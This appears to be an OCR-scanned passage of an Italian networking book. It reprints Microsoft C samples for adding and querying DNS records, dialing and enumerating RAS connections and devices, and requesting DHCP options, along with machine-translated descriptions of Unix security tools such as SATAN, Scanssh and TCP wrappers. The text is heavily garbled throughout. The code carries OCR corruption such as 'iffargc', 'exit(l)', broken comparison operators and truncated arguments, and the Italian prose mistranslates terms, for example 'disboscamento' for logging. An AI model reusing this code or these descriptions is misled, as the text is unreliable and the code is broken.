fprintf (stderr, "Where : \n\tOwnerName is the owner field to be added\n") ; 
fprintf (stderr, "\tType is the type of resource record to be added A or 
CNAME\n ") ; 

fprintf (stderr, "\tData is the data corresponding to RR to be added\n") ; 
fprintf (stderr, "\tTtl is the tinte to live value in seconds \n") ; 
fprintf (stderr , "\tDnsServerIp is the ipaddress of DNS server (in dotted 
decimai notation) \n ") ; 
exit(l); 

} 

// the main function 

void cdecl main(int argc, char *argv[]) 

{ 

DNS_STATUS status; // return value of 

DnsModifyRecordsInSet () function . 

PDNS_RECORD pmyDnsRecord = NULL; //pointer to DNS_RECORD structure 
PIP4_ARRAY pSrvList = NULL; //pinter to IP4_ARRAY structure 

LPTSTR pOwnerName = NULL, pNameData = NULL; //owner name and the data 

for CNAME resource record 

char HostipAddress [255] ; //Ip address required to add host 

record 

char DnsServIp [255] ; //DNS server ip address 



memset (HostipAddress, 0, 255) ; 
memset (DnsServIp, 0 , 255) ; 



//Allocate memory for DNS_RECORD structure. 

pmyDnsRecord = (PDNS_RECORD) LocalAlloc ( LPTR, sizeof ( DNS_RECORD ) ); 

if ( ! pmyDnsRecord) { 

printf ( "Memory allocaltion failed\n") ; 
exit (1) ; 

} 

iffargc > 8) { 

for(int i = 1; i < argc ; i++) { 

if ( (argv[i][0] == // (argv[i] [0] == '/') ) { 

switch (tolower (argv[i] [1] ) ) { 

case 'n ' : 

pOwnerName = argv[++i]; 

pmyDnsRecord->pName = pOwnerName; //copy the Owner 

name Information 

break; 
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pmyDnsRecord->wType = DNS_TYPE_A; //add host 

records 

else if ( !stricmp(argv[i+l] , "CNAME") ) 

pmyDnsRecord->wType = DNS_ TYPE_ CNAME; //add 

CNAME records 

else 

Usage (argv[ 0] ) ; 
break; 
case ' 1 ' : 

pmyDnsRecord->dwTtl = atol (argv ) ; // tinte to 

live value in seconds 

break; 
case 'd': 

if (pmyDnsRecord->wType == DNS_TYPE_A) { 

pmyDnsRecord->wDataLength = sizeof (DNS_A_DATA) ; 
//data structure for A records 

strcpy (HostipAddress, argv[++i ] ) ; 

pmyDnsRecord->Data . A . IpAddress = 
inet_addr (HostipAddress) ; //convert string to proper address 

break; 

} 

else { 

pmyDnsRecord->wDataLength = 
sizeof (DNS_PTR_DATA) ; //data structure for CNAME records 

pNameData = argv[++i] ; 

pmyDnsRecord->Data . Cname . pNameHost = pNameData; 
break; 

} 

case 's': 

// Allocate memory for IP4_ARRAY structure 
pSrvList = (PIP4_ARRAY) 
LocalAlloc (LPTR, sizeof (IP4_ARRAY) ) ; 

if(ìpSrvList) { 

printf ("Memory allocation failed \n") ; 
exit(l); 

} 

if(argv[++i]) { 

strcpy (DnsServIp, argv[i ] ) ; 

pSrvList->AddrCount = 1; 

pSrvList->AddrArray[0] = inet_addr (DnsServIp) ; //DNS 



server IP address 



break; 
} 



de fault: 

Usage (argv[ 0] ) ; 
break; 

} 

} 

else 

Usage (argv[ 0] ) ; 



} 

} else { 

Usage (argv[ 0] ) ; 

} 



// Calling function DNSModifyRecordsInSet_A to add Host or CNAME 

records 

status = DnsModifyRecordsInSet_A(pmyDnsRecord, //pointer to 
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attempt secure dynamlc updates 
secure dynamlc update is requlred 
DNS server IP address 
for future use 



NULL, 

DNS_UPDATE_SECURITY_OFF, //do not 



NULL, 
pSrvLlst, 
NULL) ; 



// used when 

//contalns 

//reserved 



if (status) { 

If (pmyDnsRecord->wType == DNS_TYPE_A) 

prlntf ("Falled to add the host record for %s and the error is %d 
\n", pOwnerName, status); 
else 

printf ( "Failed to add the Cname record for %s and the error is 
%d \n", pOwnerName, status); 
} else { 

if (pmyDnsRecord->wType == DNS_ TYPE_A ) 

printf ("Success fully added the host record for %s \n", 

pOwnerName) ; 

else 

printf ( "Success fully added the Cname record for %s \n", 

pOwnerName) ; 
} 



LocalFree (pmyDnsRecord) ; // Free the memory allocated for DNS_RECORD 
structure 

LocalFree (pSrvList) ; // Free the memory allocated for IP4_ARRAY 
structure 



Quest'altro sorgente invece serve a reperire informazioni sul DNS in quanto esegue delle 
query su di questo. 



/******************************************************* *****\ 

THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO 
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 
PARTICULAR PURPOSE . 

Copyright © 2000 Microsoft Corporation. Ali Rights Reserved. 
/******************************************** 



/* 

FILE: 

DESCRIPTION: 
send query to 

vice-versa . 



Dnsquery . cpp 

This sample illustrates the use of DnsQuery () function to 
a DNS server to resolve the host name to an IP address and 



PLATFORM: 
WRITTEN BY: 
DATE: 



Windows 2000 
Rashmi Anoop 
3/22/2000 



*/ 
/* 
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Includes 



*/ 



^include <w±ndows.h> //wlndows 

^include <wlndns.h> //DNS api ' s 

^include <stdio.h> //standard i/o 

# include <winsock.h> //winsock 



-s [DnsServerlp ] \n", 



//Usage of the program 
void Usage (char *progname) { 

fprintf (stderr, "Usage\n%s -n [OwnerName] -t [Type] 
progname) ; 

fprintf (stderr, "Where : \n\t\"OwnerName\ " is name of the owner of the 
record set being queried\n") ; 

fprintf (stderr, "\t\"Type\" is the type of record set to be queried A or 
PTR\n " ) ; 

fprintf (stderr, "\t\"DnsServerIp\"is the IP address of DNS server (in 
dotted decimai notation) ") ; 

fprintf (stderr , "to which the query should be sent\n") ; 
exit(l); 

} 

// the main function 

void cdecl main(int argc, char *argv[]) 



{ 



DNS_STATUS status; 
function . 

PDNS_RECORD pDnsRecord; 
PIP4_ARRAY pSrvList = NULL; 
LPT STR. pOwnerName = NULL; 
WORD wType; 
char DnsServIp [255] ; 
DNS_FREE_ TYPE freetype ; 
freetype = DnsFreeRecordListDeep; 
IN_ADDR ipaddr; 



// return value of DnsQuery_A() 



//pointer to DNS_RECORD structure 
//pinter to IP4_ARRAY structure 
//owner name to be queried 
//Type of the record to be queried 
//DNS server ip address 



if (argc > 4) { 

for(int i = 1; i < argc ; i++) { 

if ( (argv[i][0] == // (argv[i] [0] == '/') ) { 

switch (tolower (argv[i] [1] ) ) { 

case 'n ' : 

pOwnerName = argv[++i]; 
break; 

case ' t ' : 

if ( !stricmp(argv[i+l] , "A") ) 

wType = DNS_TYPE_A; //Query host records to 



resolve a name 



resovle an IP address 



else if ( !stricmp(argv[i+l] , "PTR ") ) 

wType = DNS_TYPE_PTR; //Query PTR records to 

else 

Usage (argv[ 0] ) ; 

i++; 
break; 



case 's' 
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pSrvList = (PIP4_ARRAY) 
LocalAlloc (LPTR, sizeof (IP4_ARRAY) ) ; 

lf(!pSrvList) { 



server IP address 



prlntf ( "Memory allocation failed \n") ; 
exit(l); 

ì 

if(argv[++i]) { 

strcpy (DnsServIp, argv[i ] ) ; 

pSrvLlst->AddrCount = 1; 

pSrvList->AddrArray[0] = lnet_addr (DnsServIp) ; //DNS 

break; 
} 



de fault: 

Usage (argv[ 0] ) ; 
break; 

} 

ì 

else 

Usage (argv[ 0] ) ; 



} 



} 

else 

Usage (argv[ 0] ) ; 

// Calling functlon DnsQuery_A () to query Host or PTR records 

status = DnsQuery_A(pOwnerName, //pointer to OwnerName 

wType, //Type of the record to 

be queried 

DNS_QUER Y_B YPASS_ CACHE, // Bypasses the resolver 

cache on the lookup. 

pSrvList, //contains DNS server IP 

address 

&pDnsRecord, //Resource record 

comprising the response 

NULL) ; //reserved for future use 

if (status) { 

if(wType == DNS_ TYPE_A ) 

prlntf ( "Failed to query the host record for %s and the error is 
%d \n", pOwnerName, status); 
else 

printf ("Failed to query the PTR record and the error is %d \n", 

status) ; 

} else { 

iffwType == DNS_TYPE_A) { 

//convert the Internet network address into a string 
//in Internet standard dotted format, 
ipaddr . S_un . S_addr = (pDnsRecord—>Data . A . IpAddress) ; 
printf ("The IP address of the host %s is %s \n", 
pOwnerName, inet_ntoa (ipaddr) ) ; 

// Free memory allocated for DNS records 



DnsRecordListFree (pDnsRecord, freetype) ; 

} 

else { 

printf ( "The host name is %s \n", (pDnsRecord- 
>Data .PTR. pNameHost ) ) ; 

// Free memory allocated for DNS records 
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DnsRecordLlstFree (pDnsRecord, freetype) ; 

} 

} 

LocalFree (pSrvLlst) ; 



Strumenti di sicurezza di rete 

P ipaci 

• logdaemon 
^ portmap 

• rgcbind 

• Sara 

• SATAN 

• Scanssh 

• screend 

• securelib 
9 incarti TCP 

• xinetd 



ipacl 

Il pacchetto ipacl è di Siemens. Forza tutti i pacchetti TCP e UDP ad attraversare con facilità 
una lista di controllo accessi. Il file di configurazione permette ai pacchetti di essere accettati, 
rifiutati, accettati condizionatamente, e rifiutati condizionatamente basandosi su 
caratteristiche come I' indirizzo della sorgente, indirizzo della destinazione, numero di porta di 
sorgente, e numero di porta di destinazione. Dovrebbe essere portatile a qualsiasi sistema 
che utilizza sistema V STREAMS per il suo codice di rete. 



logdaemon 

Il pacchetto logdaemon da Wietse Venema. Fornisce versioni modificare di rshd, rlogind, ftpd, 
rexecd, login, e telnetd quella registrazione significativamente ulteriori informazioni di le 
versioni di venditore normali, permettendo la revisione contabile migliore di problemi per 
mezzo dei file di registrazione. Include anche sostegno per l'ex pacchetto di password S/ Key. 



portmap 

Il programma portmap di Wietse Venema. Una sostituzione per il programma portmap 
normale che tenta di chiudere tutti i bugs noti in portmap. Questo include la prevenzione del 
furto dell' archivio di password NIS, prevenzione dei comandi ypset non autorizzati, e 
prevenzione di furto degli archivi NFS. 
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rpcbind 

Il programma rpcbind per Wietse Venema. Una sostituzione per il programma rpcbind Sun 
che offre controllo accessi e disboscamento copioso. Permette il controllo accessi ospite 
basato su indirizzi della rete. 



Sara 

L'assistente di ricerca (SARA) dell'ispettore di sicurezza è un software di terza generazione 
su cui Unix ha basato lo strumento di analisi di sicurezza lo stesso su cui è basato il modello 
SATAN. 




SATAN 



SATAN, il sistema Administrator Tool per l'analisi di rete, è un analizzatore di sicurezza di 
rete progettato da Dan Farmer e Wietse Venema. SATAN scandisce i sistemi collegati alla 
rete e annota l'esistenza di vulnerabilità ben note, spesso sfruttate. Per ogni tipo di problema 
trovato, SATAN offre una spiegazione del problema e quello che può essere fatto. 




Scanssh 

Scanssh scandisce reti per server SSH e restituisce la stringa di collegamento fornita dal 
server. Dalla stringa di collegamento, voi potete determinare quale versione di SSHD è 
corrente, quale protocollo SSH (1 o 2) è realizzato, e se SSH protocoll 2 i server possono 
rimanere per protocollare 1 nel caso che un cliente SSH non possa trattare protocollo 2. 
Scanssh è stato sviluppato da Niels Provos all'università della Michigan. Il codice è 
multithreaded e scandisce sottoreti molto velocemente. CIAC ha fatto una revisione di codice 
sorgente 
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Costruito e eseguito il test su OpenBSD e Linux, ma esso dovrebbe funzionaree anche con 
altri sistemi operativi UNIX+liki. 

Le versioni vulnerabili includono: 



SSH comunicazioni sicurezza SSH 2.x e 3.x (se configurato con fallback di versione 1 
abilitato solo) sicurezza di comunicazioni SSH SSH 1 .2.23-1 .2.31 F assicurate a SSH versioni 
prima di versioni 1.3.11-2 OpenSSH prima di 2.3.0 (se configurato con fallback di versione 1 
abilitato solo) 



screend 



Il pacchetto screend per Jeff Mogul. Fornisce un demone e modifiche di nocciolo da 
permettere a tutti i pacchetti di essere filtrati basato su indirizzo della sorgente, indirizzo della 
destinazione, o qualsiasi altro byte o insieme di byte nel pacchetto. Dovrebbe lavorare alla 
maggior parte dei sistemi che utilizzano stile Berkeley rete di servizi nel nocciolo, ma richiede 
modifiche di nocciolo (cioè, codice sorgente di nocciolo.) 



securelib 



Il pacchetto securelib per William LeFebvre. Fornisce una sostituzione con biblioteca in 
comune da 4.1.x sistemi SunOS che offre nuove versioni di lo accettate, il sistema di rete 
recvfrom, e recvmsg chiama. Queste chiamate sono compatibili con gli originali, eccetto che 
essi controllano l'indirizzo della macchina che fa partire il collegamento per assicurarsi che gli 
sia permesso di collegarsi, basato sul contenuto del file di configurazione. Il vantaggio di 
questo avvicinamento è che può essere installato senza re-i- compilare qualsiasi software. 



Incarti TCP 

Il pacchetto tcp_wrapper per Wietse Venema. Chiamare precedentemente log_tcp. Permette 
monitoraggio e controllo sopra chi si collega a uni ospiti TFTP, EXEC, FTP, porti RSH, 
TELNET, RLOGIN, FINGER, e SYSTAT. Include anche una biblioteca in modo che altri 
programmi possano essere controllati e controllati nella stessa moda. 



xinetd 

xinetd è una sostituzione per inetd, demone di servizi Internet. Sostiene controllo accessi 
basato sull'indirizzo dell'ospite remoto e sul tempo di accesso. Fornisce anche capacità di 
disboscamento estese, includevano ora iniziale di server, indirizzo ospite remoto, nome 
utente remoto, fase di esecuzione di server, e azioni richiesto. 
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1 1 sistema di connesione remota e l'assegnazione dinamica I P 

In questi capitoli abbiamo parlato in generale di quello che riguardava le reti tralasciando 
quella che è la connessione via accesso remoto. 

L'uso di internet tramite una rete locale poteva avvenire specificando diversi parametri nel 
settaggio del protocollo TCP dell'interfaccia usata per uscire dal sistema. 
Generalmente le reti intranet dispongono di un router oppure di un sistema che permetta la 
condivisionedi una connessione internet. 

Nei vecchi sistemi esistevano software particolari come ad esempio WinGate il quale 
permetteva a più macchine di usare una sola connessione alla rete internet. 
I routers hanno permesso di specificare all'interno dei settaggi delle schede di rete quello 
definito come default gateway ovvero l'indirizzo IP, che in genere è del router stesso, usato 
come ponte per uscire verso internet. 

Abbiamo anche detto che generalmente i sistemi su di una rete intranet dispongono di una 

classe di IP riservati per questo scopo i quali per uscire devono prima essere convertiti in IP 

pubblici ovvero quelli attribuiti dagli organi di gestione della rete quali il NIC. 

Un metodo differente utilizza il protocollo DHCP per l'assegnazione dinamica degli IP. 

Un server dove viene fatto girare il software che gestisce il server DHCP riceve dai client 

delle richieste e selezionando da dei range specificati all'atto del settaggio, prelevano e 

attribuiscono al sistema un IP che verrà utilizzato per tutta la durata delle sessione. 

I sistemi casalinghi che non dispongono di reti ma soltanto di modem in genere utilizzano 

quello che viene chiamato con il nome di Accesso Remoto. 

Windows a basso livello gestisce delle interfacce hardware mediante dei device driver che in 
questo caso corrispondono alle porte di comunicazione COM oppure a quelle che sono 
relative ai modem. 

Un meccanismo speciale gestisce il colloquio con questi sistemi utilizzando e stringhe 
specifiche di controllo che in genere si attengono allo standard Hayes. 
Una serie di comandi preceduti da AT permettono di settare tutte le caratteristiche delle 
connessione fisica come ad esempio i protocolli di correzione d'errore, quelli di compressione 
dati e cosi via. 

Ad ogni modo quando prendete in giro un CD che vi installa la connessione a qualche 
provider del tipo Tiscali, Tin o simili vi vengon fatto alcuni settaggi e precisamente il sistema 
di accesso al modem che vi permette di fare la chiamata via telefono al server di connessione 
e quello che vi setta il protocollo TCP riferito al sistema di accesso remoto. 
Se andate a vedere il CD con tutti gli SDK di Microsoft al suo interno troverete anche quello 
relativo al sistema di accesso remoto. 
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Remote 



Service 

The Remote Access 
Service (RAS) API 
ìs included in 

Microsoft® 
LJ 



Overview 

General 
Information 
about Remote 
Access 
5e rvice. 



Reference 
Documentatoli 



Il sistema di programmazione è costituito da un certo numero, abbastanza elevato, di funzioni 
le quali sono orientate alla gestione di moltissime funzionalità legate ai modem e ai routers. 
Il sorgente che segue ad esempio esegue una chiamata : 

/*************************************************************************** 
***\ 

* This is a part of the Microsoft Source Code Samples . 

* Copyright 1993 - 2000 Microsoft Corporation. 

* Ali rights reserved. 

* This source code is only intended as a supplement to 

* Microsoft Development Tools and/or WinHelp documentation . 

* See these sources for detailed information regarding the 

* Microsoft samples programs . 

\* ***************************************** 
*** / 



/* 

* RasDial . c 



* 

* Usage : 

* RasDial -e [entry name] -p [phone number] -u [username] 

* -z [password] -d [domain] 
* 

* RAS API's used: 

* RasDial 



* 

* RasGetConnectStatus 
* 
* 



RasHangUp 



RasGetProjectionlnfo 



* Created by: Mazahir Poonawala 

* Date: " 03/05/98 

* Modified by: Mazahir Poonawala 

* Date: 03/15/99 
*/ 



tidefine WIN32_LEAN_AND_MEAN 



^include <stdio.h> 
^include <windows.h> 
^include <ras.h> 
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^include <stdl±b.h> 
^include <t±me . h> 

// Usage 

vold Usage (char *progname) 
i 

fprlntf (stderr, 

"Usage\n%s \t-e [entry name] -p [phone number] \n\t\t-u [username] -z 
[password] -d [domain] \n" , 
progname) ; 
exit (1) ; 

} 



int main (int argc, 
{ 

LPRASD IALPARAMS 

HRASCONN 

LPRASCONNSTATUS 

RASPPPIP 

int 

DWORD 

DWORD 

char 

DWORD 



**argv) 

IpRa sDi a lParams ; 
hRasConn; 
IpRasConnSt atus; 
*lpProjection; 

i; 

nRet; 

cb; 

eh; 

tcLast; 



IpRasDialParams = (LPRASD IALPARAMS) GlobalAlloc (GPTR, 

sizeof (RASD IALPARAMS) ) ; 

if (IpRasDialParams == NULL) 
{ 

printf ( "GlobalAlloc failed\n") ; 
return -1; 

} 

lpRasDialParams->dwSize =sizeof (RASD IALPARAMS) ; 
hRasConn = NULL; 



// Copy command line arguments into the RASDIALPARAMS structure 

if (argc >1) 

{ 

for (i=l; i <argc; i++) 
{ 

if ( (arg V [i][0] == '-') Il (argv[i] [0] == '/') ) 
{ 

switch (tolower (argv[i ] [1] ) ) 
{ 

case 'e': // Entry name 

lstrcpy (lpRasDialParams->szEntryName, argv [++i ] ) ; 
break; 

case 'p ' : // Phone number 

lstrcpy (lpRasDialParams->szPhoneNumber, argv [++i ] ) ; 

break; 
case ' u ' : // User name 

lstrcpy (lpRasDialParams->szUserName, argv[ ++i ] ) ; 

break; 
case ' z ' : // Password 

lstrcpy (lpRasDialParams->szPassword, argv[ ++i ] ) ; 

break; 

case 'd' : // Domain name 

lstrcpy (lpRasDialParams->szDomain, argv[ ++i ] ) ; 

break; 
default : 

Usage (argv[ 0] ) ; 

break; 

} 

} 

else 
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; 

else 

Usage (argv[ 0] ) ; 

printf ("Dialing. . . \n") ; 

// Calling RasDlal synchronously 

nRet = RasDlal (NULL, NULL, IpRasDIalParams, 0, OL, ShRasConn) ; 

if (nRet) 

{ 

prlntf ("RasDlal falled: Error = %d\n", nRet); 
return -1; 

} 

IpRasConnStatus = (LPRASCONNSTATUS) GlobalAlloc (GPTR, 

sizeof (RASCONNSTATUS) ) ; 

if (IpRasConnStatus == NULL) 
{ 

prlntf ("GlobalAlloc falled. \n") ; 
return —1; 

} 

lpRasConnStatus->dwSize = sizeof (RASCONNSTATUS) ; 

// Checking connection status using RasGetConnectStatus 
nRet = RasGetConnectStatus (hRasConn, IpRasConnStatus) ; 
if (nRet .'= ERROR_SUCCESS) 
{ 

prlntf ("RasGetConnectStatus falled: Error = %d\n", nRet); 
return -1; 

} 

else 
{ 

if (lpRasConnStatus->rasconnstate == RASCS_Connected) 

prlntf ("Connection estabilished using %s\n", lpRasConnStatus- 
>szDeviceName) ; 
} 

IpProjection = (RASPPPIP *) GlobalAlloc (GPTR, sizeof (RASPPPIP) ) ; 

if (IpProjection == NULL) 

{ 

prlntf ("GlobalAlloc falled. \n") ; 
return -1; 

} 

lpProjection->dwSize = sizeof (RASPPPIP) ; 
cb = sizeof (RASPPPIP) ; 

// Getting the Ras client and server IP address using 
RasGetProjectionlnfo 

nRet = RasGetProjectionlnfo (hRasConn, RASP_PppIp , IpProjection, &cb) ; 

if (nRet == ERROR_BUFFER_TOO_SMALL) 
{ 

GlobalFree (IpProjection) ; 

IpProjection = (RASPPPIP *) GlobalAlloc (GPTR, cb) ; 
if (IpProjection == NULL) 
{ 

printf ( "GlobalAlloc failed. \n") ; 
return —1; 
} 

nRet = RasGetProjectionlnfo (hRasConn, RASP_PppIp, IpProjection, &cb) ; 

if (nRet != ERROR_SUCCESS) 
{ 

printf ("RasGetProjectionlnfo failed: Error %d", nRet); 
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; 

else 

{ 

printf ( "\nRas Client IP address : %s\n", lpProjectlon->szIpAddress) ; 
printf("Ras Server IP address: %s\n\n", lpProjection- 
>szServerIpAddress) ; 
} 

ì 

else 
{ 

if (nRet != ERROR_SUCCESS) 
{ 

printf ("RasGetProjectionlnfo falled: Error %d", nRet); 
return -1; 

} 

else 

{ 

printf ("\nRas Client IP address: %s\n", lpProjectlon->szIpAddress) ; 

printf ("Ras Server IP address: %s\n\n", lpProjection- 
>szServerIpAddress) ; 
} 

} 

printf ("Press any key to hang up. . . \n") ; 
scanf("%c", &ch) ; 

// Terminating the connection using RasHangUp 
nRet = RasHangUp (hRasConn) ; 
if (nRet .'= ERROR_SUCCESS) 
{ 

printf ( "RasHangUp falled: Error = %d", nRet) ; 
return -1; 

} 

tcLast = GetTickCount () + 10000; 

while( (RasGetConnectStatus (hRasConn, IpRasConnStatus) != 

ERROR_ INVAL ID_HANDLE ) && (tcLast > GetTickCount ()) ) 
( 

Sleep (50) ; 

} 

printf ("Hung Up\n") ; 

GlobalFree (IpProjection) ; 
GlobalFree (IpRasDialParams) ; 
GlobalFree (IpRasConnStatus) ; 




Nel caso in cui si desideri avere una lista delle connessioni è possibile usare : 







***\ 




* 


This is a part of the Microsoft Source Code Samples . 


* 


Copyright 1993 - 2000 Microsoft Corporation. 


* 


Ali rights reserved. 


* 


This source code is only intended as a supplement to 


* 


Microsoft Development Tools and/or WinHelp documentation . 


* 


See these sources for detailed Information regarding the 


* 


Microsoft samples programs . 






***/ 




/* 




* 
* 


RasEnumConnections . c 
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* RasEnumConnections 
* 

* RAS API's used: 

* RasEnumConnections 
* 

* Created by: Mazahir Poonawala 

* Date: 02/18/98 

* Modified by: Mazahir Poonawala 

* Date: 03/15/99 
*/ 



^include <windows.h> 
iinclude <stdio.h> 
^include <ras.h> 
^include <raserror.h> 



int main (void) 
{ 



DWORD nRet; 

LPRASCONN IpRasConn; 

LPRASCONN lpTempRasConn; 

DWORD lpcb = sizeof (RASCONN) ; 

DWORD IpcConnections; 

DWORD i; 

HRASCONN hRasConn; 



// Allocate buffer with default value 

IpRasConn = (LPRASCONN) GlobalAlloc (GPTR, sizeof (RASCONN) ) ; 

if (IpRasConn == NULL) 

{ 

printf ( "GlobalAlloc failed. \n"); 
return —1; 

} 

lpRasConn->dwSize = sizeof (RASCONN) ; 

nRet = RasEnumConnections (IpRasConn, &lpcb, SlpcConnections) ; 

switch (nRet) // Check whether RasEnumConnections succeeded 
{ 

case ERROR_BUFFER_ TOO_SMALL : // Since initial buffer allocation was 

small . 

GlobalFree (IpRasConn) ; // Free initial buffer 

// And reassign a new buffer with the value returned in 

lpcb 

IpRasConn = (LPRASCONN) GlobalAlloc (GPTR, lpcb); 

if (IpRasConn == NULL) 

{ 

printf ( "GlobalAlloc failed. \n"); 
return -1; 

} 



lpRasConn->dwSize = sizeof (RASCONN) ; 
/ / Again cali RasEnumConnections 

nRet = RasEnumConnections (IpRasConn, &lpcb, 

SlpcConnections) ; 

if (nRet .'= 0) 

{ // RasEnumConnections failed 

printf ( "RasEnumConnections failed: Error = %d\n", 

nRet) ; 

GlobalFree (IpRasConn) ; 
return -1; 

} 

else 

{ // RasEnumConnections succeeded. Print the results . 

printf ("The following RAS connections are currently 

active\n\n") ; 

lpTempRasConn = IpRasConn; 
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{ 

printf ( "Size : %d\n" , lpTempRasConn- 

prlntf ( "Entry name: %s\n", lpTempRasConn- 

prlntf ( "Device name: %s\n", lpTempRasConn- 

hRasConn = lpTempRasConn->hrasconn; 
lpTempRasConn++ ; 

ì 
ì 

break; 

case 0 : // RasEnumConnections succeeded with intial buffer 
allocation. 

printf ("The following RAS connections are currently 

active\n\n") ; 

lpTempRasConn = IpRasConn; 

for (i = 0; i < IpcConnections ; i++) 

{ 

printf ( "Size : %d\n ", lpTempRasConn->dwSize) ; 

printf ( "Entry name: %s\n", lpTempRasConn- 

>szEntryName) ; 

printf ( "Device name: %s\n", lpTempRasConn- 

>szDeviceName) ; 

hRasConn = lpTempRasConn->hrasconn; 
lpTempRasConn++ ; 

} 

break; 

de fault : // RasEnumConnections failed with some error. 

printf ( "RasEnumConnections failed: Error = %d\n", nRet) ; 
break; 

} 

GlobalFree (IpRasConn) ; 
return 0; 

} 



Infine l'enumerazione dei device disponibili è possibile ottenerla con : 



/******************************************************* 


***\ 






* 


This 


is a part of the Microsoft Source Code Samples. 


* 


Copyright 1993 - 2000 Microsoft Corporation. 


* 


Ali 


rights reserved. 


* 


This 


source code is only intended as a supplement to 


* 


Microsoft Development Tools and/or WinHelp documentation . 


* 


See 


these sources for detailed Information regarding the 


* 


Microsoft samples programs . 


\ ******************************************************* 


***/ 






/* 






* 
* 




RasEnumDevices . c 


* 




Usage : 


* 
* 




RasEnumDevices 


* 




RAS API's used: 


* 
* 




RasEnumDevices 


* 




Created by: Mazahir Poonawala 


* 




Date: " 02/12/98 


* 




Modified by: Mazahir Poonawala 


* 




Date: 03/15/99 



>dwSize) ; 
>szEntryName) ; 
>szDeviceName) ; 
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^include <w±ndows.h> 
^include <std±o.h> 
^include <ras.h> 
# include <raserror . h> 

int main (void) 
{ 

DWORD i; 
DWORD nRet; 
DWORD lpcb = 0; 
DWORD IpcDevices; 
LPRASDEVINFO IpRasDevInfo ; 
LPRASDEVINFO lpTempRasDevInfo; 

// To determine the required buffer size, calling RasEnumDevices 

// with the IpRasDevInfo parameter set to NULL and the variable 

// pointed to by lpcb set to zero. The function returns the required 

// buffer size in the variable pointed to by lpcb. 

nRet = RasEnumDevices (NULL, Slpcb, HpcDevices) ; 

if (nRet == ERROR_B UFFER_ TOO_ SMALL ) 
{ 

IpRasDevInfo = (LPRASDEVINFO) GlobalAlloc (GPTR, lpcb); 

if (IpRasDevInfo == NULL) 

{ 

printf ("GlobalAlloc failed. \n") ; 
return -1; 

} 

lpRasDevInfo->dwSize = sizeof (RASDEVINFO) ; 

} 

else 
{ 

printf ( "RasEnumDevices failed: Error %d\n", nRet); 
return -1; 

} 

nRet = RasEnumDevices (IpRasDevInfo, Slpcb, &lpcDevices) ; 

if (nRet != 0) 

{ 

printf ( "RasEnumDevices failed: Error %d\n", nRet); 
return -1; 

} 

else 
{ 

printf ("The following RAS capable devices were found on 
this machine : \n \n ") ; 

printf ("Device\t \t\tCategory\n\n" ) ; 
lpTempRasDevInfo = IpRasDevInfo; 
for (i=0; i < IpcDevices; i++) 
{ 

printf ( "%s\t%s\n" , lpTempRasDevInfo->szDeviceName, 
lpTempRasDevInfo->szDevi ceType ) ; 

lpTempRasDevInfo++; 

} 

) 



GlobalFree (IpRasDevInfo) ; 




Nel caso di utilizzo di provider come Tiscali ci ritroviamo nuovamente ad avere a che fare con 
un sistema di assegnazione dinamica degli indirizzi. 

Precedentemente abbiamo detto che il protocollo DHCP permette di fissare gli IP di una 
macchina. 

Il settagio fato dal CD di installazione di Tiscali, Tin e altri provider di questo tipo, settano 
l'interfaccia per essere gestista tramite DHCP. 
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La richiesta su un server DHCP può essere eseguita con : 
/* 

* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 

* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO 

* THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 

* PAR TICULAR PURPOSE . 
* 

* Copyright © 1999 - 2000 Microsoft Corporation. Ali Rights Reserved. 
* 

* Author: Stephen R. Husak - Microsoft Developer Support 
* 

* Abstract : 

* This code demonstrates the use of the DHCP Client Options API - 

* DhcpRequestParams 
* 

*/ 



/* 

* Includes 
*/ 

^include <windows.h> 
iinclude <stdio.h> 
^include <iphlpapi . h> 
^include <dhcpcsdk.h> 



// Windows 

// standard i/o 

// ip helper 

// dhcp client options api 



// initial buffer size for options buffer 
tidefine INITIAL_B UFFER_ SIZE 256 



/* 

* OutputError 
* 

* retrieves the system message for an error 
*/ 

void OutputError (DWORD dwError) 
{ 

LPVOID lpMsgBuf; // buffer to copy string into (allocated by cali) 



if (FormatMessage (FORMAT_MESSAGE_ALLOCATE_BUFFER / 
FORMAT_MESSAGE_FROM_SYSTEM \ 

FORMAT_MESSAGE_IGNORE_INSERTS , NULL, dwError, 

MAKELANGID (LANG_NEUTRAL , SUBLANG_DEFAULT) , // De fault 

language 

(LPTSTR) SlpMsgBuf, 0, NULL) == 0) 
printf ("Error Reported: %d GetLastError : %d\n", dwError, 

GetLastError () ) ; 
else 
{ 

printf ("Error %d: %s\n", dwError, (LPCSTR) lpMsgBuf) ; 



// free the buffer. 
LocalFree (lpMsgBuf) ; 
} 



* DetermineAdapter 
* 

* NOTE: 
* 

* This code retrieves the Adapter Name to use for the DHCP Client API 

* using the IPHelper API. 
* 

* NT has a name for the adapter that through this API has device 

* Information in front of it followed by a {GUID}, 98 does not and 

* the Index is used instead. So if the string is set to ?? (what it is 

* in 98) we revert to using the string representation of the index. 
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V 

LPSTR DetermlneAdapter ( ) 
{ 

DWORD dwResult; 

IP_ INTERFACE_ INFO * plnfo = NULL; 
structure 

DWORD dwSlze = 0; 

CHAR szAdapter [MAX_ADAPTER_NAME] = {0} ; 
char * ptr; 

// get buffer size 
dwResult = Getlnterfacelnfo (NULL, SdwSize) ; 
If (dwResult == ERROR_INSUFFICIENT_BUFFER) 
{ 

// allocate buffer 

plnfo = ( IP_ INTERFACE_ INFO *) LocalAlloc (LPTR, dwSlze) ; 
if (ìplnfo) 
{ 

OutputError (GetLastError () ) ; 

exit (1) ; 

} 

// make the actual cali 

dwResult = Getlnterfacelnfo (plnfo, SdwSize) ; 
if (dwResult != ERROR_SUCCESS) 
{ 

OutputError (GetLastError () ) ; 

exit (2) ; 

} 

} 

else 
{ 

OutputError (GetLastError () ) ; 

exit (3) ; 

} 

// convert, parse, and convert back 
ptr = NULL; 

WideCharToMultiByte (0 , 0, pInfo->Adapter[0] .Name, 

lstrlenW (pInfo->Adapter [0 ] . Name) , 
szAdapter, MAX_ADAPTER_NAME, NULL, NULL) ; 

if (szAdapter [0] != '?') 
{ 

// find the GUID 

ptr = strchr (szAdapter, '{'); 

} 

// use index if the pointer is not set 
if (!ptr) 
{ 

